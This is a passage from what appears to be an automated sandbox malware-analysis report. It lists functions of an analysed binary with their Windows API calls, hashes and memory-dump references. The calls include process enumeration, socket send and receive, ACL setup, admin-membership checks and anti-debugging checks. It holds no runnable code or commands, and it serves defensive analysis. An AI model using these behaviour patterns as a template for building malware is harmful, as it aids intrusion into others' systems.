                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseHandleProcess32$CreateFirstNextSnapshotToolhelp32
                                                                            • String ID: A#v
                                                                            • API String ID: 1789362936-4158731453
                                                                            • Opcode ID: 1471ee849dff24a4befe8b526fffc0861fdadfa22c3fb6ec5f894aa6a78cc1cf
                                                                            • Instruction ID: 0efcc1be4767eba86c2baa8bce08570c5d06e82a98ecd6a08942da45e0a1b4d5
                                                                            • Opcode Fuzzy Hash: 1471ee849dff24a4befe8b526fffc0861fdadfa22c3fb6ec5f894aa6a78cc1cf
                                                                            • Instruction Fuzzy Hash: 30111C71901218EBDB28DFA4DD5CBA9B7B8BB44300F204A9CE519A7290D7389B41DF50
                                                                            Function 007C44E0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 55processCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 007C44F4
                                                                            • Process32FirstW.KERNEL32(000000FF,0000022C), ref: 007C451C
                                                                            • StrCmpIW.SHLWAPI(?,-008358D8), ref: 007C4566
                                                                            • CloseHandle.KERNEL32(000000FF), ref: 007C4574
                                                                            • Process32NextW.KERNEL32(000000FF,0000022C), ref: 007C458E
                                                                            • CloseHandle.KERNEL32(000000FF), ref: 007C459C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseHandleProcess32$CreateFirstNextSnapshotToolhelp32
                                                                            • String ID: A#v
                                                                            • API String ID: 1789362936-4158731453
                                                                            • Opcode ID: b87dc0bd44d78dc6b5bf7a130450a23c87710d4e06a2ce813f4158950648d50a
                                                                            • Instruction ID: 2036bda5c54e94a21485cf57eb05698f2115662a3e74f83dc908508dd4ae9dc9
                                                                            • Opcode Fuzzy Hash: b87dc0bd44d78dc6b5bf7a130450a23c87710d4e06a2ce813f4158950648d50a
                                                                            • Instruction Fuzzy Hash: AB111C71901218DBDB24DFA4ED5CBA9B7B8BB54301F204AACA506A7290D738DB51DF50
                                                                            Function 007DCA00 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 41processCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetCurrentProcessId.KERNEL32 ref: 007DCA09
                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 007DCA16
                                                                            • Process32FirstW.KERNEL32(00000000,0000022C), ref: 007DCA3A
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007DCA53
                                                                            • Process32NextW.KERNEL32(00000000,0000022C), ref: 007DCA6C
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007DCA7A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseHandleProcess32$CreateCurrentFirstNextProcessSnapshotToolhelp32
                                                                            • String ID: A#v
                                                                            • API String ID: 3177329567-4158731453
                                                                            • Opcode ID: 074e0a2615d9368c49a5a1fd468795edf90acc32b08b73a6576fc7740ca2325c
                                                                            • Instruction ID: 43668468ddab01a67f0a677cbd487ac3fe0030684af5b825119b59dd873c31b1
                                                                            • Opcode Fuzzy Hash: 074e0a2615d9368c49a5a1fd468795edf90acc32b08b73a6576fc7740ca2325c
                                                                            • Instruction Fuzzy Hash: A801CC75A01219EBDB11EFA4DD8CB9DBBB8BF88701F104595F505A6290D7389F40DB50
                                                                            Function 007E0630 Relevance: 12.1, APIs: 8, Instructions: 124memorynetworkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LocalAlloc.KERNEL32(00000040,000003F0,?,?,?,?,?,?,?,?,007E04A6,?), ref: 007E0672
                                                                            • htons.WS2_32(?), ref: 007E0697
                                                                            • wsprintfA.USER32 ref: 007E06C0
                                                                              • Part of subcall function 007E0870: WSACreateEvent.WS2_32 ref: 007E0876
                                                                              • Part of subcall function 007E0870: WSAEventSelect.WS2_32(?,00000000,00000002), ref: 007E0893
                                                                              • Part of subcall function 007E0870: WSAWaitForMultipleEvents.WS2_32(00000001,?,00000000,00000001,00000000), ref: 007E08D3
                                                                              • Part of subcall function 007E0870: WSACloseEvent.WS2_32(00000000), ref: 007E08E0
                                                                            • ___crtGetLocaleInfoEx.LIBCMTD ref: 007E0701
                                                                              • Part of subcall function 007DF670: send.WS2_32(00000000,?,000000FF,007E0E0C), ref: 007DF683
                                                                              • Part of subcall function 007E0790: WSACreateEvent.WS2_32 ref: 007E0796
                                                                              • Part of subcall function 007E0790: WSAEventSelect.WS2_32(?,00000000,00000001), ref: 007E07B3
                                                                              • Part of subcall function 007E0790: WSAWaitForMultipleEvents.WS2_32(00000001,?,00000000,00000001,00000000), ref: 007E07F3
                                                                              • Part of subcall function 007E0790: WSACloseEvent.WS2_32(00000000), ref: 007E0800
                                                                            • ___crtGetLocaleInfoEx.LIBCMTD ref: 007E073A
                                                                              • Part of subcall function 007DF650: recv.WS2_32(00000000,?,000000FF,007E0A9A), ref: 007DF663
                                                                            • und_memcpy.LIBCMTD ref: 007E076A
                                                                            • LocalFree.KERNEL32(00000000), ref: 007E0776
                                                                            • LocalFree.KERNEL32(00000000), ref: 007E0784
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Event$Local$CloseCreateEventsFreeInfoLocaleMultipleSelectWait___crt$Allochtonsrecvsendund_memcpywsprintf
                                                                            • String ID:
                                                                            • API String ID: 2352516679-0
                                                                            • Opcode ID: 80123577eceb3c3e213876514939b057926296c09f4f591a5f2de1be49c51a38
                                                                            • Instruction ID: 62a8086c298c6410e3e7a67c5b180b3a07516696d732543cd6fb4a904a7b1f41
                                                                            • Opcode Fuzzy Hash: 80123577eceb3c3e213876514939b057926296c09f4f591a5f2de1be49c51a38
                                                                            • Instruction Fuzzy Hash: 5A412DB5E00219AFCB04DF94D885ABEBBB5BF4C300F148549EA45AB341D639E981CFE4
                                                                            Function 007E04F0 Relevance: 10.6, APIs: 7, Instructions: 113memorynetworkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LocalAlloc.KERNEL32(00000040,000003F0,?,?,?,?,?,?,?,007E043F,?), ref: 007E0532
                                                                            • htons.WS2_32(?), ref: 007E0557
                                                                              • Part of subcall function 007E0870: WSACreateEvent.WS2_32 ref: 007E0876
                                                                              • Part of subcall function 007E0870: WSAEventSelect.WS2_32(?,00000000,00000002), ref: 007E0893
                                                                              • Part of subcall function 007E0870: WSAWaitForMultipleEvents.WS2_32(00000001,?,00000000,00000001,00000000), ref: 007E08D3
                                                                              • Part of subcall function 007E0870: WSACloseEvent.WS2_32(00000000), ref: 007E08E0
                                                                            • ___crtGetLocaleInfoEx.LIBCMTD ref: 007E059D
                                                                              • Part of subcall function 007DF670: send.WS2_32(00000000,?,000000FF,007E0E0C), ref: 007DF683
                                                                              • Part of subcall function 007E0790: WSACreateEvent.WS2_32 ref: 007E0796
                                                                              • Part of subcall function 007E0790: WSAEventSelect.WS2_32(?,00000000,00000001), ref: 007E07B3
                                                                              • Part of subcall function 007E0790: WSAWaitForMultipleEvents.WS2_32(00000001,?,00000000,00000001,00000000), ref: 007E07F3
                                                                              • Part of subcall function 007E0790: WSACloseEvent.WS2_32(00000000), ref: 007E0800
                                                                            • ___crtGetLocaleInfoEx.LIBCMTD ref: 007E05D6
                                                                              • Part of subcall function 007DF650: recv.WS2_32(00000000,?,000000FF,007E0A9A), ref: 007DF663
                                                                            • und_memcpy.LIBCMTD ref: 007E0606
                                                                            • LocalFree.KERNEL32(00000000), ref: 007E0612
                                                                            • LocalFree.KERNEL32(00000000), ref: 007E0620
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Event$Local$CloseCreateEventsFreeInfoLocaleMultipleSelectWait___crt$Allochtonsrecvsendund_memcpy
                                                                            • String ID:
                                                                            • API String ID: 3977134054-0
                                                                            • Opcode ID: 702f1e7174b68191cad86f4f631d8f38d7336e3e3d0d0c9af7528d2ecdff7e67
                                                                            • Instruction ID: 0a65a5a5bf0a1761d4f6d28722ac3782119cc293b5f5101a3acd565a66439181
                                                                            • Opcode Fuzzy Hash: 702f1e7174b68191cad86f4f631d8f38d7336e3e3d0d0c9af7528d2ecdff7e67
                                                                            • Instruction Fuzzy Hash: 674160B5E00249EFCB04DF94D881ABEB7B5BF9C300F248549F909A7342D675EA41CBA5
                                                                            Function 007D0400 Relevance: 10.6, APIs: 7, Instructions: 81memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • AllocateAndInitializeSid.ADVAPI32(00000000,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 007D044D
                                                                            • _memset.LIBCMT ref: 007D0463
                                                                            • SetEntriesInAclW.ADVAPI32(00000001,FFFFFFFF,00000000,00000000), ref: 007D04A0
                                                                            • LocalAlloc.KERNEL32(00000040,00000014), ref: 007D04B3
                                                                            • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 007D04C8
                                                                            • SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000), ref: 007D04DE
                                                                            • LocalFree.KERNEL32(00000000), ref: 007D04F1
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: DescriptorInitializeLocalSecurity$AllocAllocateDaclEntriesFree_memset
                                                                            • String ID:
                                                                            • API String ID: 4046344516-0
                                                                            • Opcode ID: eea88f3deb746a4e8b534c7ad280a953551f72747d1d8700d3784e54cc651906
                                                                            • Instruction ID: 23fc9bdbb622ef8839122c3deac0e7f5b9727effe2349730e6faaa2451e101e3
                                                                            • Opcode Fuzzy Hash: eea88f3deb746a4e8b534c7ad280a953551f72747d1d8700d3784e54cc651906
                                                                            • Instruction Fuzzy Hash: 52310870E40348EFEB00DFE4E859BEEBBB4AB44704F108559F600BA2C1D7B95A44CBA1
                                                                            Function 007DC090 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleHandleA.KERNEL32(NTDLL,RtlGetVersion), ref: 007DC0AD
                                                                            • GetProcAddress.KERNEL32(00000000), ref: 007DC0B4
                                                                            • RtlGetVersion.NTDLL(0000011C), ref: 007DC0DA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AddressHandleModuleProcVersion
                                                                            • String ID: NTDLL$RtlGetVersion
                                                                            • API String ID: 3310240892-3678323915
                                                                            • Opcode ID: c762ec5a24f2d99fffb97ea46f8fd0cbebbb4579741f4d76785aff6add495acf
                                                                            • Instruction ID: d81ac4802bbebee3f6de48bacfc888060998bb4cdd2effd0ddaefb47d7ded018
                                                                            • Opcode Fuzzy Hash: c762ec5a24f2d99fffb97ea46f8fd0cbebbb4579741f4d76785aff6add495acf
                                                                            • Instruction Fuzzy Hash: 11F03071C4522CDBCB249F54DC09BE8BBB8BB0C315F0001D9A948A2380CB7859E4CF58
                                                                            Function 007E7FFF Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • IsDebuggerPresent.KERNEL32 ref: 007EC560
                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 007EC575
                                                                            • UnhandledExceptionFilter.KERNEL32(007F8C78), ref: 007EC580
                                                                            • GetCurrentProcess.KERNEL32(C0000409), ref: 007EC59C
                                                                            • TerminateProcess.KERNEL32(00000000), ref: 007EC5A3
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                            • String ID:
                                                                            • API String ID: 2579439406-0
                                                                            • Opcode ID: 71f9f16e92bd220ef561c0bd645f3464b2d21a09d4abb8d8a08ac99284f594d9
                                                                            • Instruction ID: e07c24adb881ece83ec7dad5ddff8aeb3e8452f3b8fc7ecdc048060aea19fbe3
                                                                            • Opcode Fuzzy Hash: 71f9f16e92bd220ef561c0bd645f3464b2d21a09d4abb8d8a08ac99284f594d9
                                                                            • Instruction Fuzzy Hash: C82109B8401348DFD740EF29FD896583BB4FB9C301F104859E50A8B3A1EBB85992CF05
                                                                            Function 007D2AB0 Relevance: 6.2, APIs: 4, Instructions: 229comCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CoInitializeEx.COMBASE(00000000,00000000), ref: 007D2AE0
                                                                            • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 007D2B06
                                                                            • CoCreateInstance.OLE32(007F7B50,00000000,00000001,007F7940,00000000), ref: 007D2B21
                                                                            • CoUninitialize.COMBASE ref: 007D2DDD
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Initialize$CreateInstanceSecurityUninitialize
                                                                            • String ID:
                                                                            • API String ID: 374467530-0
                                                                            • Opcode ID: f22e7216293d9c3beed00be65aad4216de7993b8407421d9fb8c3f2f122fbf8d
                                                                            • Instruction ID: 23c4061237cbdbb520f94ffb3fd81ee60ddfa9cfe1bd044d7bfa5d4c24886934
                                                                            • Opcode Fuzzy Hash: f22e7216293d9c3beed00be65aad4216de7993b8407421d9fb8c3f2f122fbf8d
                                                                            • Instruction Fuzzy Hash: E8B1C474E01219CFDB14DF58C995BADFBB1BF48310F20829AE519A7391DB346A81CF91
                                                                            Function 007DC3A0 Relevance: 4.5, APIs: 3, Instructions: 42memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • AllocateAndInitializeSid.ADVAPI32(00000000,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 007DC3DB
                                                                            • CheckTokenMembership.ADVAPI32(00000000,?,00000000), ref: 007DC3F4
                                                                            • FreeSid.ADVAPI32(?), ref: 007DC409
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                            • String ID:
                                                                            • API String ID: 3429775523-0
                                                                            • Opcode ID: 1dfe076fa865561ff52cd5f0f0e0ad184e44d32fda71d8bd152fa59ee57c82c1
                                                                            • Instruction ID: 2eac3d579a5f612d51017f41547bc7b119600dab9e3cfa7f48fdf776cce36205
                                                                            • Opcode Fuzzy Hash: 1dfe076fa865561ff52cd5f0f0e0ad184e44d32fda71d8bd152fa59ee57c82c1
                                                                            • Instruction Fuzzy Hash: 2201FB34D44388FAEB15DBE8D859BAEBFB8AB18704F0444C8E544AA2C1D7B95644CB91
                                                                            Function 007D70F2 Relevance: 4.5, APIs: 3, Instructions: 41COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 007D716A
                                                                            • ___crtGetLocaleInfoEx.LIBCMTD ref: 007D7187
                                                                              • Part of subcall function 007DF670: send.WS2_32(00000000,?,000000FF,007E0E0C), ref: 007DF683
                                                                            • closesocket.WS2_32(?), ref: 007D7193
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: InfoLocale___crtclosesocketsendsetsockopt
                                                                            • String ID:
                                                                            • API String ID: 1028938620-0
                                                                            • Opcode ID: 3338ac1d707adee57eeaf954d44fe57c1c5e4da5764b55948ec1d9da6c973546
                                                                            • Instruction ID: d2f84b06e7871f9cf9b9bcfea2fd88df6842a881ff06ed566c806df71e7ab448
                                                                            • Opcode Fuzzy Hash: 3338ac1d707adee57eeaf954d44fe57c1c5e4da5764b55948ec1d9da6c973546
                                                                            • Instruction Fuzzy Hash: 780186B5A04208FBEB04DF90EC89BED7774EF88700F108519F605AB280F7799944C754
                                                                            Function 007D70D9 Relevance: 4.5, APIs: 3, Instructions: 41COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 007D716A
                                                                            • ___crtGetLocaleInfoEx.LIBCMTD ref: 007D7187
                                                                              • Part of subcall function 007DF670: send.WS2_32(00000000,?,000000FF,007E0E0C), ref: 007DF683
                                                                            • closesocket.WS2_32(?), ref: 007D7193
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: InfoLocale___crtclosesocketsendsetsockopt
                                                                            • String ID:
                                                                            • API String ID: 1028938620-0
                                                                            • Opcode ID: 81040521ad41993b8c03e0ced297aa46e96b58a65889e78eecfbead36f710734
